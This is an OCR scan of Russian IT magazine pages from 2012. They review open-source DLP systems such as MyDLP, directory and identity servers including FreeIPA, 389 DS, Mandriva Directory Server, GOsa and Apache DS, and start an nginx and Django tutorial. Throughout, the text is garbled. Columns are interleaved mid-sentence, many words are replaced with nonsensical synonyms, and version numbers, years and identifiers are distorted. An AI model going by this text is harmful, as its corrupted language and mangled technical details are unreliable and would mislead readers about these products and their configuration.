тов равно обнаружи вает работающие кейлоггеры.

ХАКЕР

03/158/2012

017


SYN/ACK

l'{j i..--UO'd-.....

-........ _,..._...,., т о...•• -~-.,....~--·""'-

~ ln.W.""~;ММ'

'\1ooooohold-ro.~,

~ lnoblo !INIМ. .....

n-ohold-fo<r.ь ......

0

_

z

""-·--,...-....., O ln .W..I'I- IM"f~

l11нo•МW-•""'f""' ..... '

l.] ln.W..UII.IUitO~

'"-•l>old-'--...,..• 0

Q ln_ТU.W..,ID,..._

"""''""""-"""~ ' -,

- ·- · ck-~-ol>old

...

~"'"-""""•......_,.,., • • - " • ,.,...,м

......-t..J.• r ..............

;:~':;:;;:::;~;,:~

-.мw

.......

~--......" .

~<М•otмr...w.u-N

[

Окно настроек

. ,.." _ ,.

0

MyDLP

Просмотр снимков экрана во

Модуль Netwoгklock использует методы

Falcongaze SecureTower инт е Красава со веб-nрокси [Squidl к фильтрации входящего равно ис­

DPI [Deep Packet

lпspectioп, основательный обсуждение батман кетов! равно умеет посвящать прото­

х од автор этих строк щего веб-трафика , пользование во качестве контентнога

колы помимо зависимости ото порта, поэтом у сис лейтмотив позволяет совсем нечего делать

ф ильтра чтобы

соз выбрасывать политики про любого вида траф ика: веб-трафика,

sos т а вление списков

Postfix, MS Exchange, слитие вместе с Zimbгa; ACL сверху ос нове IР -адресов да шаблонов.

трафика соцсетей, файлового, почтов ого да !М-трафика. Распозна­ ются из инхронизации не без; мобильными устройствами : ActiveSyпc,

Palm

MS

HotS yпc равно iTuпes. В нынешнее момент во офици ­

альных вместе с 3 сках н ет поддержки Р2Р да

MyDLP умеет

обнар у живать да разверзать зашиф­

Функ ционально система, n остроенная получи

Skype.

Возможно истощить присовокупительный устройство полно­

текстового п оиска

К пунш е того ,

р ов анные файлы alias файлы, закрытые паролем [если принимать ключ!.

Devicelock Seaгch Sегvег [DLSSI, который-нибудь

MyDLP,

состоит с четы­

рех ко мпонентов:

MyDLP Netwoгk -сетевой сервер ,

которой исnользуе т ся про

находит информацию на теневы х ко пия х равным образом журналах. Управление

nерехвата ТСР-соединений равно является главный для того

производится близ помощи гр у пповы х политический деятель домена, поэто­

Написан бери E гlang равным образом

му клиенты машинально п одх ватывают установки. Правил а

не без; да стеме, поддерживающей интерпретаторы.

создаются сквозь вычитчик

На со л учай отсутствия

De vice lock

De vicelock GгoupPo l icy Мапаgег. Active Diгectoг y предусмотрена выступ

Епtегргisе Manageг, не без; nо собная nолучать документация

с любых LDАР-каталогов, на рента

Console

Python,

MyDLP.

можетбытьустановлен держи кто хочешь

MyDLP Endp oint - aгeнт, водружаемый получи конечных системах WinXP -S e7en l, nозволяет кон­

[поддерживаются 02/64 - битные

тролирова т ь весь критические операции : коnирование файлов,

De vicelock Management

отображается тек у ще е sos тояни е агентов. Такж е кли­

nечать, забирание экрана, приём nрав администратора равным образом т .

MyDLP Secuгity Monitoг- монитор,

n.

отслеживающий, кто именно равным образом какие

е нты могут хайло навливаться из еще nрек онфигурирова нны ми

материал использует.

nараметрам и.

MyDLPWeb Ul-инструментуnравления настройками Netwoгk и Endpoint, которые эпизодически nодключаются ко Web Ul, nо­

MYDLP COMMUNITY EDITION

л у чают последниеустановки равным образом сбрасывают лог. Написан бери РНР и

Сайт проекта :

mydlp.orq. Лицензия: GNU GPL. ОС сервер: Ubuntu 00.04 LTS. ОС клиенты: Windows ХР, Vista, 0 (x86/x64l.

никак не вызывает. Девиз

Бесnл~тная DLР-си не без; топик [разработчики расшифровывают

MyDLP.

Data Loss Pгe vent ionl не без; отк рытым исходным

ко дом, включающая колонна функций к пр едотвращения прибыль

жайших nланах- POP/ IMAP, MSNMS/Jabbeг да MS Exchangel; анализ документов - txt, MS Woгd/Excei/Poweгpoint 07-2k3, RTF,

ODF, PDF, PostScгipt , XM L, HTML, TAR, GZIP, RAR равным образом др . ;

равно архивов-ZIР,

0z,

пусть даже небольшое видео руководство. П осле из-за n уска клиента на трее

Python-Magic , вроде

Ubuntul, облик VMwaгe равным образом реnозиторий Ubuntu 00.04 LTS [downloads. med гatech.com/ubu ntul. За nлату предлагается Еntегргisе-версия, имеющая расширен­ ные собственность анализа, выправленный интерфейс, каран т ин, функцию

ар х ивирования равно обеспечиваемая n оддержкой.

регистрация, блокировка [в nлатной версии Enteгpгi se добавле­ ны а р хи вирование да карантин!; файлов

сообразно МD5-хешу;

018

О реп nолностью в отношении т ражает экстракт

невозможно. Проект предлагает инструкционный 050-образ [на базе

разбирание nротоколов- НТТР/ НТТРS , FTP/ FТPS , SMTP, ICAP [в бли­

распознавание М 0М Е-типа объединение данным

Easy, Simple,

Документация проекта заключает десяток мануалов, нашел т ь

nоявляется значок, сnрятать какой-никакой от п омощью штатных средств

данны х:

LibгeOffi ce

настроек равно журнала собы т ий исnоль­

Процесс настройки равно подключения клиентов трудностей

Русификация: таки да нет (возможна собственными силами!. эту аббревиатуру вроде

Adobe Flex, про хранения MySQL.

зу ется

ЗАКЛЮЧЕНИЕ Нужно помнить, аюшки?

DLP- сие

nрежде сумме инструмент, позво­

ляющий несравнимо ослабить риски, наличность ко т орого ранее само

вытяжка тек не без; та с файловбинарных форматов;

в соответствии с себя дисциnлинирует сотрудников. Ожидать, который инъекция

установление исходного стих [C /Cн/C#/Java/A DA да др.l; идентификация банковских счетов/кредитных карт, некоторых

такого склада системы гарантированно защитит ото утечек , возникающи х

национальны х идентификационных штукенция ов;

захочет послать alias выбросить ценную информацию, дьявол во сколько бы в таком случае ни стало

во результате умышленных действий, также безграмотный стоит. Если инсайдер

употребление пользовательски х правил равным образом регулярных выражений,

найдет дорога для того этого, вследствие чего пристало в свою очередь ис n ользовать постоянно

статистический рассмотрение да байесовские классификаторы;

традиционные методы защиты . ::х::

ХАКЕР 03 / 058/ 001 0


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE .........,. ......,...

Мы знаем , идеже во мире отыскать самые соль земли провизия . Вы знаете, что-нибудь можете выискать их рsщом , лещадь маркой TASH


SYN/ACK

высокочтимый gгindeг Яремчук [g г indeг!Osynack.гul

В FгeeiPA по вер~:: 2.1.3 включи;ел

имеется в наличии СSR(СVЕ-

~~11-36361. Для ее т

звимость

__ устранени ваш покорный слуга следуе обновиться перед

,

0 04

'' '' '' ''

\ \

'

-

насчёт FгeeiPA

моя особа

исnользуется А~

аутентификаци

да авторизац~~t для в решении по отношению

виртуализации,

nостроенн~~М . на основе

Инсталляцию

описываемых nродуктов рекомендуется производить на се ч истую »

систему,

ю

неграмотный выполняющу никаких других

функций .

Для

зации

cинxpsoн~ctive Diгec-

с имо tогу нeoбxo~indows 389D

найти

Sync. После установки

оnакета 089-dsдля 389DS конфигура~;ситить

долженствует следовать

setupadmin.pl. скриnт

ница Red Hat Стра IРА- ге dhat __ .com/

I!J:.Q.IIl.QLiм.

• Утилита sys.t~m­ config-autentofo;я

cation, Сайт nрое_кта Fгeei­

PA- ~.

ds-

входящ

Fedora,

на сосрт~вит вкладку, соде ю nозволяющу

Страница Mandгi~

Diгectoгy S~г:":гq.

mds mandr1y_._

020

активировать ию тентификац

:~рез FгeeiPA.

ХАКЕР

03/158/2012


Корпоративные сношения

GOSll • ~oJIII flleJ;dot~НIIt OIYAookmПJ

+

· С

А

~Istltlp

{lp61111

.III'I.Q

0,11!115111\М

/:IS.Yptol ll

00..

\1MCl'l)yl4etlt ЬI

мо~Ш;~ f(r~fox

!;П~IQ

• )

~ccp·U121 .o.o. ~'"'

• o l "'· ~:.~с:. ----,_, 0.

-~~1 Gon14110

*'·'

<* мandriva

е А WlleOiмtoGOP

!!1!1.1

---

Adm!nlslrм!on

_

Ноше

User.groupand computer

SAMBAseNice

Nelwork

Mallservice

: !!iЪ••••_. : :11!11.

: м=-

: ~

f&.

.

managemenl

managemenl

EFI!

~~~

....

~ ~ ::...t~~OЦII _klop _ _ ",...

ca.ror ~«es• 00 GOu

:а=:...-::

......

-·-

Co<>t>t.~!I-I)'Pol"d ~UIO .... f<,ed

.

,,_ Pr...,_" v

..,."

.--

Ц~К~М~''""11-

_,....,pl..."

Mandriva Management Console nроста равно

089

~-..-

М..,.IIЦ'IQ~di-U!

DIRECТORY

nонятна на работе

SERVER

Разработчики отмечают высок у ю коэффициент полезного действия равным образом мас­ штабируемость

directory.fedoraproject.orq . Лицензия: GNU GPL. ОС: Fedora/Red Hat/CentOS, хорошенького понемножку подвизаться во Linux (Deblan, Ubuntu, Gentoo), Solaris, HP/UX 01, lrix, AIX, Windows да OSF/1 . обществом близ спонсорской поддержке

0996

годы

Red Hat. Базой для Netscape Оiгес tогу

одной яма может делать давно четырех

конфликтов, балансировкой н агрузки равным образом резервированием сервера . Поддерживаются работающие на режиме геаd-опlу сервера, некий аналог

него

Read

Опlу Oomaiп Сопtгоllег во

Active

Оiгесtогу

Win2k8 .

В сегодняшнее сезон план бесстрастно предлагает репази­

тарий равным образом пакеты с целью RHEL/Fedoгa [подходят да ради Ceпt05l. Кроме того, возможна узел во других Liпux [ О еЬiап, Ubuntu, Gentool, 5olaгis, HP/UX 01. Некоторые версии поддерживаюттакже Windows, lгix , AIX равным образом 05 F/ 0. Однако рост равным образом последующая обеспечение

0егvег.

Он получил новое имя- F edoгa Оiгесtогу 0егvег- впоследствии того,

Red Hat. В 0009 году 389 Оiгесtогу 0егvег [389 по части номеру порта службы LOAPI. Причина проста: F05 неразрывно 2005

08905 . В

равноправных мастер-серверов со автоматическим разрешением

Сервер каталогов уровня предприятия, создаваемый со­

равно как власть получай него во

:!OQ2-20U~I~-GOiLG0нZ.7l

GOsa nозволяет уnравлять учетными заnисями *nix равно сервисами

Сайт проекта:

послужил разрабатываемый от

е

году приобрела

редакция который раз изменил термин получи и распишись

во << неофициальных>> системах требует через админа сейчас некоторой

ассоциировался от Fedoгa, что, по мнению мнению разработчиков, тормо­

подготовки.

зило развитие, во частности интеграцию во некоторые дистрибутивы.

Компоненты

На основе

08905 Red Hat выпустила коммерческую версию Red Ha t Оiгесtогу 0егvег [R H0 01 вместе с техподдержкой 04/7. Возможности 089 05 включают полную поддержку пр отокола LDAPv3, 05 L/ТL5 - равным образом 0А5 L­

08905

выпускаются за лицензии

GNU GPL,

да сер­

вер базируется возьми ряде продуктов из другими лицензиями IMPL/ LGPL/GPL/XI. Стоиттакже отметить, почто 089 05 является помогите т авной частью F гee iPA- централизованного решения на управления

аутентификацию, синхронизацию данных [пользователь, группа,

информацией касательно nользователях да политиках да ради аудита. Речь об

батман роль) от

этом продукте пойдет чуточку ниже.

Active Оiгесtогу [при условии, зачем в КД Win2k3/2k8 установлен составляющая Windows 0yncl, различение доступа впло ть поперед отдель н ых а три бутов [и мя, гр уппа, IP равно т. д .l В качестве криптадвижка используется ленинка N55 через Mozilla Pгoject. Конструктивно 08905 состоит с сервера каталогов [Саге Оiгесtогу 5егvег, СО51 равным образом сервера администрирования [Admin 0егvегl. Задача последнего- господство всеми доступными С О5 , для того что пред­

MANDRIVA DIRECTORY SERVER Сайт проекта:

mds.mandriva.orq . GNU GPL. Дистрибутивы: Mandriva, Deblan/Ubuntu, CentOS/RHEL/Fedora, openSUSE, отражение VMware. Лицензия:

Сервер Maпdгiva Оiгесtогу 0егvег [М О5 0 - простое во использо ­

лагается графическая модильон [389-coпsolel равно утилиты командной строки. В

Linux микроконсоль устанавливается безотчетно [написана на Javal. Для управления из-под Win2k3/2k8 получи сайте проекта сле­ дует скача ть пакетец Windows Console.

вании решение, nозволяющее близ помощи наглядного интерфейса уnравлять учетными записями пользователей да груnп, доступом

равным образом сетевыми сервисам да . П относительно сути, сие ванька-встанька обная мезонин надо

FUSIONDIRECTORY Поскольку подступ для исходному коду

GOsa

расшивка ради управления, имеющее больше

Четко определен инвентарь поддерживаемых

удобные инструменты в целях разработки,

дистрибутивов (DeЬian, CeпtOS

только равным образом испортить документацию .

0/RHEL 0, Fedoгa 14/15, openSUSE 01.3/11 .4, SLES 011, и, главное,

приняли постановление что до создании побольше

В октябре 0011-го вышла трансформирование FusionDiгec­

пользу кого каждого изо них создан репозиторий ,

открытого равным образом сполна поддерживаемого

toгy

сообществом фор ка на привлечения

началась ничуть недавно, по части каких -то особых

сторонних специалистов, а тоже обеспечения

функциональных отличиях ото

пользу кого тех, кто такой никак не имеет связи для компании

Gonicus GmbH,

был затруднен, разработчики

0.0.2, но,

круглым счетом по образу вещь по-над nроектом

GOsa

доколь

обеспечивающий простую установку. Еще одно крест заключается в формально поддерживаемых веб­

условий к написания плагинов лещадь большее

бредить неграмотный nриходится. Документация , объединение сути,

серверах. Разработчики nредлагают готовые

наличность приложений. Новый вариант

состоит изо испарения руководств, но, учитывая

конфигурационные файлы на

получил заглавие FusioпDiгectoгy ( fusiondiгec­

асаб не без;

равно

GOsa,

получай стадии ознакомления

Lighttpd,

Apache2

возможна тоже узел

toгy. org l . Разработчики обещали далеко не токмо

из FusionDiгectoгy позволено истощить

нате пgiпх , только настройки придется порождать

сотворить самое <<м ощное да универсальное >>

документацию бери материнский проект.

самостоятельно.

ХАКЕР

03/158/2012

021


SYN/ACK

f1\e Edit V\tw SNrth

~nll

~

Не1р

~~ -

х ~~-

х

~ed:n:-

(root@fedora - )# ipa user - show vpupkin - -att

Console

dn: uid=vpupkin, cn=users, cn=accounts, dc::locat Useг

togin : vpupkin

first name: Vasja

Last na111e : Pupkin Full na11e: Vasja Pupkin Disptay name: vasja Pupkin Initiats: VP Home directory: /home/vpupkin GECOS fietd: vpupkin Login shel t :· / Ьin / sh Keгberos princi pa t: vpupkin@LOCAL UID : 0989288883 GIO : 0989288883

Account disabled : Fatse Hember of groups: ipausers ipauniqueid : 0dc4c446 - 02eЗ - lleB - a2d4 - B88c29f9bc76 krbext radata : AAgBAA=, AAL8vaBNcat9vdC9hZGlpbkBНТ8NBTAAж

- - г. ~ .-----

krЫastpwdchange:

08118469281326Z krbpa s swordexpiration : 08118489281326Z krbpwdpo\icyreference: cn::global_ policy, cn::LOCAL , cn : keгberos , dc::::locat mepmanagedent ry : cn:avpupkin, cn:::groups , cn=account s , dc=t ocat objectcta ss: top , pers on , organizationatperson, inetorgperson , inetuser, posixaccount , krbpr i nc i pa taux , krbt ic ketpoticyaux , ipaobj ect, ( root@fedora -

TroQ~......w;,;- -

~~e~O riginEntry

Для настройки

FreeiPA позволяется

LDAP- OpenLDAP,

Консоль управления

пустить в ход модильон

пусть бы возможна равным образом совместная эксплуатация из

08905.

Active

089 Directory Server

Diгectoгy равно позволяющей централизованно править аутен­

Функционально может выстуnать во качестве РОС !уровня Windows NT41, LDAP-cepвepa со синхронизацией учетных заnисей да nар а ­

тификацией пользователей, устанавли на ать политики дост упа равно ау­

лей, nолностью подменять

проектов, таких наравне дистрибутив F edoгa,

D iгectoгy либо интегрироваться

дита. Фактически FгeeiPA- сие сожительство неск ольких опенсорсных

КегЬегоs да может состоять исnользован чтобы организации однократ утнапиштим

08905, MIT КегЬегоs, NTP BIND. На этом проекте, развиваемом около финансовой подд ержке Red Hat, основан используемый во коммерческом дистриб утиве продукт IPA, каковой Red Hat до ста дух общественности летом 2008 года. Впервые шифр FгeeiPA п оявился на составе Fedoгa 0 lмай 0008гоl, при всем том нормальная синхронизирование из Active Diгectoгy возьми оный

аутентификации 05501. Разграничени е поперед сту nа с целью объектов уста­

секунда до этих пор безграмотный была реализована. На первых порах клиенты

навливается вnлоть перед отдельных атрибутов: пользователь, гр уnпа,

могли приставать вручную, так сие было неудобно. В октябре

IР-адрес, сезон равно т. д.

0009-го началась занятие надо нов ой веткой

Active

во нее. Клиентскими ОС могут исправлять должность

05 Х. Интерфейс nозволяет nр оизводить настройку аккаунтов да ACL в 0amba, распоряжаться совмес тным достуnом, nечатью держи базе CUP5, доставкой nочты IPostfixl, настроить 0quid равно службы DN5/ DHCP, а дми нистрировать уче тные заnиси GLPI. Па кет включает Windows, Linux

равно Мае

Особенно nриятно, что такое? проблемы, преследовавшие компанию Mandгiva, безвыгодный затронули

MD5

равным образом nродукт nостоянно развивается.

равным образом

0.0. Ее

финальная

видоизменение была перед ста вл ена во конце марта 0011-го. День , на который был анонсирован релиз, запомнился многим пользователям

В последних версиях для указанным возможностям добавилось

равно как << F edoгa

у царствие учетными записями системы Zaгafa, обеспечивающей

FгeeiPA2. В нынешнее пора реализованы:

05 Test Da y»,

Linux

осведомленный собственно тестированию

совместную работу, централизованное скрывание nубличных клю­

централизованное правление учетными записями п ользо ват е­

из какого рода

лей, групп, компьютеро на равно сер ви сов;

Open5SH , аудит,

политики паролей равно многое другое. Модульная

застывшая музыка nозволяет надбавлять нужную функциональность либо

ведение дост упом для приложениям, устано вка дипломат жете ро­

выключать изо интерфейса лишнее.

лей равным образом настроек КегЬегоs, управле ние правилами

MD5 несложно

масштабируется, под­

держивая ряд тысяч заnисей получай по отношению дин сер во ер. Неn осредстве нно пользу кого уп равления сервисами предназначен

Host Based Access Соntгоl-управление равным образом содержание ролей в LDAP; служба у правления сер тификатами IDogtag Ceгtificate 0егvегl.

часть ММС

обмена

agent, начерканный получи Pytho n да да от nоль зую щий для да нными XM L-RPC. Агенты настраиваются возле помощи

ахти nростого во исnользовании веб-интерфейса ММС IMandгiva Management Consolel. Администратор может наметить единственный изо двух режимов отображения: Noгmal alias Ехрегt. В медаль с

08905,

0UDO;

идентификация КегЬегоsдля пользователей да узлов;

Сеть, построенная вместе с применением FгeeiPA , функционально мо­ жет принадлежать изо трех типов систем : одного alias нескольких серве ­

пакеты nредлагаются неграмотный исключительно интересах «род­

ного » дистрибутива: в наличии частный репозиторий

Debian,

ров, клиентских машин да компьютера администратора. По следний, по сути, представляет на лицо общепринятый заказчицкий -де сктоп вместе с кон­

сборки в целях Cent05/RHEL/Fedoгa да open5U5E, а как и снаряжённый

сольными утилитами про удален ного уп равления FгeeiPA !кстати,

символ VMwaгe. Таким образом, серверную дробь

воспользоваться их положительно безвыгодный хоть умри - совсем позволительно привыкать

MD5

позволяется отно ­

сительно ахнуть далеко не успеешь да без участия nроблем определить во каждый *niх-системе.

веб-интерфейсом, какой написан сверху

Продукт включен на собрание nоставки Mandгiva Ent eгpгise 0егvег.

MD5

nредставляет лицом самое простое на установке да конфигури­

Ja val.

Чтобы усилить нагр узку нате канал, давальщик использует локаль­

ный кеш ILDB да XM LI, получая с него настройки во книга числе равным образом близ

ровании решение, освещенное на нашем обзоре, одначе самос тоя­

отсутствии доступа ко серверу. На клиентской системе устанавли­

тельная сборочка возьми других системах, в дополнение МЕ5, ведь требует

очень подробна равным образом nозволяет разобраться в всех его нюансах.

вается ходатай управления аутентификацией 0550 l5ystem 0ecuгity 5eгvices Daemonl . Клиентская порцион реализована безграмотный лишь для Red H at/Fedo гa да клонов, однако да на др у ги х ОС равным образом платформ: AIX,

iid!I!IIЩ

движение ке т ов с целью

Сайт проекта:

их

некоторых навы заговор объединение работе от

LDAP.

Док уме нтация проекта

freeipa .orq . GNU GPL. Дистрибутивы: сервер- Fedora/CentOS, клиент- Linux, AIX, HPUX, Solaris, openSUSE. Цель проекта Fг eei PA IFгee ldentity, Policy and Auditl- созда­ Лицензия :

ние для того L iпuх-систем среды, представляющей на вывеску альтернативу

022

open5U5E. Что интересно, надо сборкой клиентских Ubuntu/Debian ll aunchpad.net/fгee i pa l равным образом обесnечением совместимости работают двум сотрудника Red Hat.

HP-UX,

0olaгis,

Сnециальное nриложение lceгtmongeгl у nрощает создание сер тифи катов да уnравление ими, механически генерир уя равно nо­ лучая новомодный документ до истечении срока поведение ветхо г о. Опционально возможна объединение из DN5-сервером сверху базе

!нужен nлагин

BIND LDAP BIND со динамическим обновлением сквозь

ХАКЕР

03/158/2012


Корпоративные своя рука

Alltlwntkatlon Conflguratlon l l ldont;ty & Authontkot;on Us~r

lдdv•ncod Opt;on•J

АРАСНЕ

Account Conflguratlon

0 LDAP Free iPA 1

Softwaгe

Confl gur.~tion

( diгectoгy .

nоддерживает LDAPvЗ, КегЬегоs равным образом

.

·d

J

~~

Linu x, Windows

да Мае

05

Х , исходные

ADS возьми любой Java . возможностей LDAP,

тексты nозволяют составить

Java, Change

системе , с целью которой имеется Кроме стандартных

Passwoгd Pгotocol . Позиционируется наравне

реализованы хранимые процедуры , триггеры,

встраиваемое во прочие Jаvа-nриложения

динамические объекты

решение, всё же ни одна собака невыгодный заnрещает

другое. Распространяется перед лицензией

проэксплуатировать его автономно . Обеспечивает

Apache . В рамках nроекта разрабатывается Apache Diгectoгy Studio, включающий

действие

~

Foundation

apache . oгg ). Полностью наnисан в

Winblnd

Authentic111tion Method:

на

Сервер каталогов, разрабатываемый

Apache

NIS

Authentication

DIRECTORY SERVER

Loc111L accounts onty

User Account Dat111base:

LDAP

да КегЬегоs , возможна

Java

равным образом многое

воплощение поддержки любого протокола .

LDАР - браузер, браузер не без; х ем, редакторы

Продукт мультиnлатформенный . На сайте

LDIF

проекта достуnны nакеты интересах установки

администрирования.

да

DSML,

клиентские программы чтобы

Менеджер аутентификации во Fedora позволяет выкроить FreeiPA

GSS-TSIG ]. При у правл ении комnьютерами да группами компьюте­ ров мандат подтверждаются возле п омо щ да Ке гЬ е г оs keytab иначе

ет уп равлять подсчет ны ми вслед за п ис ями

сертификата.

телей да групп, компьютерами, списками рассылок, приложениями,

Модульная архитек т у ра серверной равным образом клиентской части по­

базисная точка уп равления всей ИТ-инфрастр у ктурой . Интерфейс позволя ­

*nix

да

настройками основных се тевы х служб :

Samba , правами

DHCP, DNS, НТТР, SMT P Gonicus GmbH ,

зволяет не принимая во внимание особых проблем интегриро на ать FгeeiPA равно кто хочешь

да т. д . Итиль зработка вед ется около эгидой компании

продукт. В сегодняшнее момент политики ис п ользуются во томик числе

ко от раиса использует

GOsa

п ользова­

во своих сервисах.

равно настройкам рабочего стола. По ка реализо ваны н е всё-таки функции

Все функции вын есе ны на плагины [принциn «о дин сервис= о дин плагин »], позтом у админ собирает конфигурацию на соо твет­

упра вления политиками , аудита равно контроля, которые пл анируется

ствии со своими н стрела-змея дами.

равно ради хра нения ровня мет яр д ос т у батман ко локальным прилож ениям

В сегодняшний день период реализо ван касательно паче

заключить на проект.

Н е т н астроек правил

SELinu x,

перед держки

централизованно г по части управления ключами

Samba, Fгe eRA DIUS , SSH да LVM, ОТРи многого

другого. Очевидный пробел проду ко та- направленность во пер­ вую что до ч ередь в производные что касается т

Red Hat дистриб ути ваша сестра .

Устано крутить

сервер н ую ч асть Fг ee iPA позволяется с репозиториев F e d oгa,

K12LTSP

CentOS,

равным образом совмес тимы х вместе с ними . Р азработчики сдела ли всё , воеже

упрости ть течение локализации на версии 0.0 [ис польз американский рубль тся gettext и UTF8]. В каталоге ins tall / po переводу нет обложка гu.ро, во ко т ором nере ­ веде получи и распишись как только малая деление сообщений. Пр оект инициативно развивается, да присутствие этом обнаруживаю т ся в отношении шиб­

0.1 .4 устраняет СSRF- уяз вимость [подделка запросов, CVE- 0011-3636].

00

плагинов, обеспе­

чиваю щ их регулирование такими сервисам и, вроде

Squ id, Dan sGuaгdi n , Postfix, Couгieг- IM AP, Maildгop , GNARWL, C y гus-SASL , OpenSSL, ISC DHCP, WebDAV, Pu гe FTPd , РРТР, КегЬегоs, Asteгisk, Nag ios, OPSI, Netatalk, FAI, гsyslog, равным образом серверами коллективной работы: SOGo, OpenGгoupwaгe, Kolab, Scalix. При этом по сию пору ваш брат ш еуказан ны е nлагины неграмотный обяза тельн что касается д олжны корпеть получай одном сервере, неко­ торые изо них мож н касательно устано свивать держи отдельные хост ы.

Уче т ные заnиси п ользова телей об ъединяют ся во гр уп пы , для ко т орых назначают ся разрешенные приложения . При создании

н овых аккаунтов применяются шаблоны [админ создает их сам]

ки . П оследний релиз

не без; прописанными п равами дост упа для объек т ам . Н абор разреш ен ий

межсайтовых

ACL состоит с как , относительно пр е д е ляющего проформа , объектов [поль ­ зова т е л ей/гру пп] равно разреше н ий. Разрешения опре д е ляют постоянно

ieiN4

во озмож ны е д ейс тв ия: соз д а ни е, удочка л ение, передвижение , чтение,

Сайт проекта: oss.gonicus.de/labs/qosa.

Лицензия:

GOsa -

GNU GPL.

Дистрибутивы: пакеты- Deblan/Ubuntu, RedHat/CentOS/Fedora, openSUSE/SLES, изо исходных текстов- первый встречный *nix. Пр оект

заметка равно т. д.

G0sa2, являющийся

надстройкой д ля nопулярных

однозначный во нашем обзоре расчёт со локализо­

ванным интерфейсом у правления. Правда , локализован симпатия доколе

неграмотный полностью, н относительно исnользова ни е

gettext

сообразно зволяе т возле необ хо ди­

мости произвести сие самостоятельно.

Поддерживает ся губы н овка во любом дистриб у тиве

опенсорсных приложений, предо ставляе т администратору е дины й

Lin ux.

Раз­

работчики рекомендуют DeЬian , подина какой-никакой соз дан единичный

fjle fdit Yi!:w Hi1tory Aookmarts

IЬols

tlt'IP

репозиторий. Такж е предварительно не без; т у пны пакеты с целью Red Ha t/CentOS/ F e d oгa и ope nSUSE/ SLES, но, как бы правил о, разработчики неграмотный спешат их соби война , почему вер эти каплю запаздывают. Можно исполь ­ зовать кому всего-навсего не лень веб - сер вер, по отношению дн ако выбор по части тдается

равным образом

nginx.

Apache2

Д окумен тация д ос т у пна ведь ль ко в английском да н е п о­

спевает следовать развитием проекта, многие моменты отражены на н ей весьма повер х ностно.

ЗАКЛЮЧЕНИЕ Даже невоо руже нн ым глазом видн о, зачем в наибольшей степени многофункцио­ USERS

в отношении --

0

нальным инструментом является

GOsa2.

Это приговор обесnечивает у власть у ч етными ради n исями равным образом многочисленными се рвисам и, поддер живает побег тан овку

на ибо льшин стве ди стрибути вов

Linu x,

име е т локализованный

интерфейс. Однако окончате льны й предпочтение зависит через конкрет н ой Девиз

ldentity Policy Audit xopowo поясняет сущность FreeiPA

ХАКЕР

03 / 058/ 0012

вслед за дачи . :х:

023


SYN/ACK

Евгеньюшка Зобнин lexecЬit.rul

СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЙ САЙТ С ИСПОЛЬЗОВАНИЕМ

NGINX И DJANGO

При обсуждении высокой производительности веб-приложений возьми стало мозгу на это дело невальна приходят такие названия, наравне

nginx, memcached, еассеlегаtог, hiphop равным образом им подобные . Фактически сие неоригинальный

укомплектование на любого высоконагруженного сайта, написанного не без; использованием РНР. Но который даже если мы хотим доставать безвыездно соки изо сайта на 121,

Django? ХАКЕР

03/158/ 0012

.


И от пытание нагрузкой

Администрирование

Ojango

доброnожеnо•ет~ 0obnln и]"'он"т~nероп./Вы"т"

Администрирование сайта

·-fu · ~fb

Груrw1Ы

· ~llllb

. · и..е.

РАСПРЕДЕЛЕННЫЙ КЕШ

.. n.

. "' и-..nь

. • И!f.\Ctilllb

СайrЬI

+ Шмф~ фа"n"" не без; n-OЩ~IO OpenSSL on)'ISII MKOUH/1 М: сео.с •мяео аоот рат•онnаМн . ПOIApaiЛIIIO, OIHfi KII MitТUITO

М: АВВУУ 08::п.лат не: сн ... аJt lнl ~- · в таком случае АО кон ца

T1ogedltems

n-1111 ..

безвыездно их адреса путем точку из запятой:

М: improw!,..,..rch"""Jine~•nkrng:l'

·~'''

. • ~ rь

+ A;Iбoolr rь

. · ~оЬuеrмть

hey lll ldltv. oax«Ьot.ruowr'llllr

discovef.:iyourV<IЬti .. . М: мноrоуроан• ... нат11жн .,.

011ПИСИ

I'OТOJ'I rt M: ПOJtн or:t • IO

К1теrор.,...

Стандартная админка

Django умеет сортировать кеш сообразно нескольким memcachedcepвepaм во автоматическом режиме . Для сего будет обратить

CACHE_BACKEND ; 'memcached://172.19.26.24e:1 0211 ;172.19.26.242:11212; 172.19.26.244:11213/ '

Django

Итак, допустим, автор сих строк собираемся зап у стить последний веб-проект и решили созидать его со использованием фреймварка Djaпgo . По­

$ sudo apt-get install nginx memcached python \ python-setuptools mysql-server

чему Ojaпgo? Потому, зачем некто красив, производителен равно невероятно Pythoп, так чтобы максимально сгрузить программ иста. Благодаря

Вместо MySQL можно, вестимо же, назначить PostgгeSQL. Django, а и uWSGI равным образом pythoп-memcached автор поставим с репо­

архитектуре модель-вид-контроллер [MVC) да модульном у дизай­

зитария Pythoп .

дружелюбен ко разработчикам. Djaпgo использует всю мощь языка

ну, в таком случае поглощать структуре, построенной изо обособленных кирпичиков, Оjапgо-приложения нате обалдайс просты во конструировании и сопровождении. Система беретка получи себя

00% работы,

$ sudo easy_install django uwsgi python-memcached

отчего описа­

ние данных, учреждение алгоритма их обработки равным образом отображения пре­ вращается во тривиальную задачу, нередко решаемую на малость

Также нам понадобится кеширующий фреймворк djohnпy-cache, о назначении которого моя персона расскажу позже:

десятков строк стих [например, интересах создания простейшего сайта с полноценной веб-админкой порядочно черкануть общей сложности мало-мальски

строк) . И всё сие вне уродливого SQL, скрытого через программи вместе с та за классами Pythoп, бери основе которых да генерируется график базы данных.

Мы ожидаем, что такое? резерв достаточно кто наделен высокую посещаемость,

$ sudo easy_install djohnny-cache

НАСТРОЙКА NGINX Первым делом настраиваем nginx . Всё сообразно стандартной схеме. Бэка­ пим нормальный конфиг nginx:

оттого нам нужно вмиг предвидеть целое возможные пути опти­

мизации . Перво-напер умереть и безграмотный встать наша сестра должны избрать легкий, стремительный ,

$ sudo mv / etc / nginx/{nginx.conf,nginx.conf.old}

спокойный во настройке равным образом сопровождении веб-сервер. Это, вестимо

же, пginx, некоторый несложно неграмотный имее т конкурентов до скорости

Создаем новоизобретённый конфиг равно пишем во него следующее:

отдачи контента. Мы откажемся ото стандартных конфигураций с что касается всякими громоздкими апачами получай стороне бэк-энда равно будем

эксплуатнуть пgiпх как бы узловой веб-сервер [впоследствии такую схему позволено несомненно расклешить от через дополнительных серве­

канал равным образом балансировщиков нагрузки). Второй шаг- вердикт вопроса в рассуждении волюм , что будут связаны nginx и Djaпgo . Понятно, в чем дело? отпустило сумме эксплуатировать интерфейс

